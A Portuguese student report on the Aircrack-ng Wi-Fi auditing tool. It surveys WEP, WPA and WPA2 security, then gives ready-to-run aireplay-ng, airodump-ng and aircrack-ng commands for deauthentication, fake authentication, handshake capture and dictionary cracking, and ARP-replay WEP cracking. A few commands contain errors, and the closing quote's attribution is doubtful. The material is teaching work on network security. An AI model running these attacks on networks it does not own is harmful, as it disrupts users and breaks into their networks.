AIRCRACK NG

Transcrição

AIRCRACK NG
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
1
AIRCRACK NG
Agostinho Batista, Ipca - Engenharia de Sistemas Informáticos - PL, IEEE
I.
INTRODUÇÃO
Com um mundo cada vez mais tecnologico e nómado, cada vez mais o ser humano evolui e utiliza sistemas wireless para
comunicação de dados, o actual crescimento da humanidade a necessidade desta em aceder à informação em qualquer local e
parte do mundo, abriu portas ao desenvolvimento e aperfeiçoamento de redes de internet sem fios, vulgarmente designadas por
Redes wireless. ( WI-FI)
A utilização destas redes é sem duvida alguma uma vantagem do presente e para o futuro, contudo quando recorremos a esta
tecnologia para implementar nas nossas casas e instituições, outras questões evidenciam-se tais como a segurança.
Este será o principal motivo da utilização do Software AirCrack, profundar a forma como o mesmo consegue aceder a
descodificar a senhas de acesso a redes wifi.
II. DESCRIÇÃO AIRCRACK-NG
A. INSTALAÇÃO DO SOFTWARE
Para trabalhar com AIRCrack-NG, será necessário efectuar instalação no PC do Utilizador, para tal terá recorrer ao site
http://www.aircrack-ng.org e efetuar o download da aplicação.
B. Sistemas Operativos
O Aircrack funcionad com sistemas operativos Linux e Windows
C. OBJECTIVO DO SOFTWARE
Conhecer as vulnerabilidades de segurança dos protocolos de transmissão WEP e WPA face a ataques de força Bruta,
Probabilidade e estatistica.
Vamos conhecer meios de protecção que compliquem a exposição das vulnerabilidades das chaves WEP e WPA
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
D. Figuras
AirCrack Software funciona em Sistemas operativos OpenSource, tais com Ubuntu, contudo existe uma versão preparada para
sistemas windows, a qual será apresentada neste documento, dado ser a mais graficamente perceptivel.
2
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
3
III. EVOLUÇÃO DA SEGURANÇA NAS REDES WIRELESS
Sistemas cifrados com standart IEEE 802.11 foram destinados para redes Wireless, propuseram-se como sistema de
confidencialidade de dados às redes de cabos em 1999.
Usam-se dispositivos de transmissão wireless caseiros e empresarios, em 2001 identificam-se facilmente debilidades na
segurança destas redes que estavam protegidas com chaves WEP.
Então a IEE cria uma correcção de segurança 802.11i para neutralizar os problemas identificados, em 2003 Wi-Fi anuncia a
substituição da Wep para WPA.
Em 2004 a aliança Wi-Fi revoga WEP-40 e WEP-104 devido a graves falhas de segurança.
A . TIPOS DE CHAVES
1. WEP - ( WIRELESS ENCRIPTION PROTOCOL )
( WIRED EQUIVALENT PRIVACY )
Baseia-se num algoritmo de cifragem RC4 que utiliza chave de
- 64 Bits ( 40 Bits mais 24 bits do Vector iniciação IV)
- 128 Bits ( 104 bits mais 24 Bits de IV )
- 256 Bits ( 232 Bits mais 24 Bits de IV )
I. FUNÇÃO
Funciona expandiente uma regra para gerar uma sequencia de numeros pseudoaleatórios de maior tamanho atraves da
operação XOR.
Não se deve usar a mesma regra para cifrar duas mensagens diferentes.
Wep especifica uma de Vector de Iniciação ( IV) de 24 bits que modifica regularmente e contactena a contrasenha.
Ilustração Gráfica
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
4
RC4 ( Cifra )
II. VULNERABILIDADES IDENTIFICADAS WEP
Com a captura de N nr de Pacotes, é possivel Y por algoritmos estatisticos, obter a chave WEP.
Colisão de IV's
Alteração de Pacotes
2. WPA
É um sistema para proteger redes sem fios ( Wi.FI, criado para corregir as deficiências de segurança do sistema anterior
WEP.
I. FUNÇÃO
WPA usa autenticação de usuários mediante um servidor, armazenam-se as credenciais e contrasenhas.
Implementa o protocolo de integridade de chave temporal ( TKIP- Temporal KEY Integrity Protocol ), altera chaves
dinamicamente.
Implementa um código de integridade da mensagem, ( MIC - Message Integrity CODE)
Inclui protecção contra ataques de Repetição
a) VERSÕES WPA
A. WPA-PSK
Muito mais segura que WEP
Usa um Algoriymo RC4 com a WEP
Baseada no protocolo TKIP( Temporal Key Integrity Protocol) que troca as chaves dinamicamente
Desvantagem
Menos Segura que WPA com Autenticação em Servidor.
B. WPA com Autenticação em Servidor
Servidor RADIUS de autenticação é o encarregado de distribuie diferentes chaves ente os usuários.
Muito Mais Seguro que WPA-PSK
Desvantagem
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
5
Complicado para configurar para uso domestico
C. WPA 2
Mesmo que WPA é apenas um estado mais avançado de cifragem (AES) em vez de TKIP
Corrige as vulnerabilidades de WPA
Esta segurança cumpre requisitos de segurança do governo Americano.
Desvantagem
Nem todos os dispositivos suportam, nomeadamente dispositivos mais antigos.
II . VULNERABILIDADE
IV. AIRCRACK
Aircrack-ng é um detector de redes, sniffer de pacote, aplicativo de quebra de WEP e ferramenta de análise para redes
locais sem fios 802.11. Funciona com qualquer placa wireless cujo driver suporta e pode capturar e analisar (sniff)
tráfego 802.11a, 802.11b e 802.11g.
V. CONCEITOS/FUNDAMENTOS
SSID [ Service SET Identifier]
BBSID[ Basic Service Set Identifier]
ESSID[Extended Service Set Identifier]
InterFace:
Dispositivo associado ao hardware em sistema
Channel
Canal de transferencia, regularmente associado à frequencia
a) Opções airePlay
# aireplay-ng <opções> <interface>
-b bssid: Direcção MAC do ponto de acesso
-d dmac: Direcção MAC de destino
-s smac: Direcção MAC de Origem ( Source)
-m len: longitude minima do pacote
-n len: longitude máxmia do pacote
-u type: control quadro;tipo campo
-v subt: control quadro;Subtipo campo
-t tods: control quadro;para DS Bit
-f fromds; control quadrode DS Bit
-w iswep; control quadro;WEP Bit
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
6
b) Opções de Injecção
-x nbpps:nr de Pacotes por segundo
-p fctrl: fixar palavra de frame control(hexacimal)
-a bssid: fixar direcção MAC do AP
-c dmac: fixar direcçao MAC de Destino
-f smac: fixar direcção MAC de origem
-e essid: ataque de falsa autenticação: nome doAP
-j: ataque de arp-Replay: injectar pacotes apartir DS
-g valor: alterar tamanho do buffer ( por Defeito 8)
-k IP: fixar destino de IP em Fragmentos
-i IP: fixar ip de origem em fragmentos
VI. ATAQUES
1. ATAQUE 0 ( DeAuthentication ATTACK)
Este ataque envia pacotes de desasociação a um ou mais clientes que estão acutalmente associados a um ponto de
acesso
Recuperar o revelar um ESSID oculto. Este é um ESSID que não é divulgado o anunciado pelo AP.
Capturar Handshakes WPA/WPA2 forçando os clientes a voltar a autenticar-se
Gerar pedidos ARP( Em windows algumas vezes os clientes limpam a sua Cache ARP, quando são desconectados)
Apliação
# aireplay-ng -0 1 -a 00:14:6c:7E:40:80 -c 00:0f:B5:34:30:30 ath
0 - Significa Desautenticar
1 é onr de e desautenticaçõe a enviar( pode enviar todas as que pretender)
0 significa enviaras continuadamente
-a 00:14:6c:7E:40:80 é a direcção MAC do ponto de acesso
-c 00:0f:B5:34:30:30 é a direcção MAC do cliente a Desautenticar, se omitirmos este
parametero destino
Serão desautenticados todos os clientes
Ath0 é o nome do interface
2. ATAQUE 1 ( FAKE AUTENTICATION)
Ataque de falsa atenticação permite realizar dois tipos de autenticação WEP ( Aberta "Open System" e partilhada
"Shared Key") e associar-se a um ponto de acesso AP.
É muito util quando necessitamos de uma direcção MAC associada para usar-la com algum dos ataques de aireplay-ng
e não há nenhum cliente associado.
Deve-se ter em conta que o ataque de falsa autenticação no gera nenhum pacote ARP
Apliação
# aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5b:EC:EE:F2 ath0
-1 Significa falsa atenticação
0 tempo de reasociação en segundos
teddy é o nome da rede wi-fi
-a 00:14:6C:7E:40:80 é a direcção MAC do ponto de acesso
-h 00:09:5b:EC:EE:F2 é a direcção MAC da nossa placa
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
Ath0 é o nome do interface
Capturar
# airodump-ng -c 9 bssid 00:11:22:33:44:55 -w psk ath0
Desautenticar cliente para capturar HandShake
#airodump-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0f:85:fd:fb:c2 ath0
Crakeando Chave
# aircrack-ng -w password.lst -b 00:14:6c:7e:40:80 psk*.cap
3. ATAQUE 2 ( Interactive Packet Reply)
Este ataque premite escolher o pacote a reenviar (injectar)
Podemos obter pacotes para injectar de duas formas
1ª Capturando pacotes na placa Wireless
2ª Utilizando um arquivo Cap.
Aplicação
# aireplay-ng -2 <opções de filtro> < opções de reenvio> -r <nome do arquivo> < interface>
- 2 significa ataque de reenvio interactivo
< opções de filtro>
< opções de reenvio>
- r < nome do arquivo> usado para especificar um arquivo cap de ler os pacotes para injectar-los (
é opcional)
<interface>
Exemplo:
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
4. ATAQUE 3 ( Request Injection)
É um classico ataque de reenvio de petição ARP o " ARP request", é um modo mais efectivo para gerar novos IVs(
Vectores de Inicialização) e funciona de forma muito eficaz
O programa escuta até encontrar um pacote ARP e quando o encontra retransmite-o até um pode de acesso.
Isto provova que o ponto de acesso tenha de repetir o pacote ARP com IV novo
O Programa retransmite o mesmo pacote ARP uma e outra vez, Mas cada pacote ARP repetido pelo AP tem um IV
novo . Todos os novos IV's nos permitem averiguar a Chave WEP.
Aplicação
# aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
-3 significa reenvio standard de petição ARP ( ARP Request)
-b 00:13:10:3:24:9C é a direcção MAC do ponto de Acesso
-h 00:11:22:33:44:55 é a direcção MAC de origem ( de um cliente associado ao de uma falsa
autenticação)
Ath0 é o nome da placa wireless
5. Crackeando os Pacotes
# aircrack-ng pacotes.ivs
7
Agostinho Batista - A7854 - Engenharia de Sistemas Informáticos Pós Laboral
8
VII.CONCLUSÃO
A utilização de ferramentas de diagnóstico e invasão vão futuramente ser o melhor processo de certificação de segurança de
redes em empresas e particulares que cada vez mais recorrem ao acesso à informação através de redes Wi-Fi.
Podemos depreender com a leitura e utilização do AIrCrack que os meios de criação de cifragem e codificação de chaves nas
redes wireless ainda continuam em desenvolvimento e investigação, o Aircrack pode ser utilizado como ferramenta para saber
quanto tempo e como terceiros podem aceder à nossa rede, o administrador apenas tem que criar "balizas" e formas de
dificultar esse mesmo acesso.
" O BOM HACKER TODOS CONHECEM, SABEM QUEM É, MAS O EXCELENTE HACKER... ESSE NUNCA SABEREMOS QUEM
UM DIA FOI." - LINUS TORVALDS

Documentos relacionados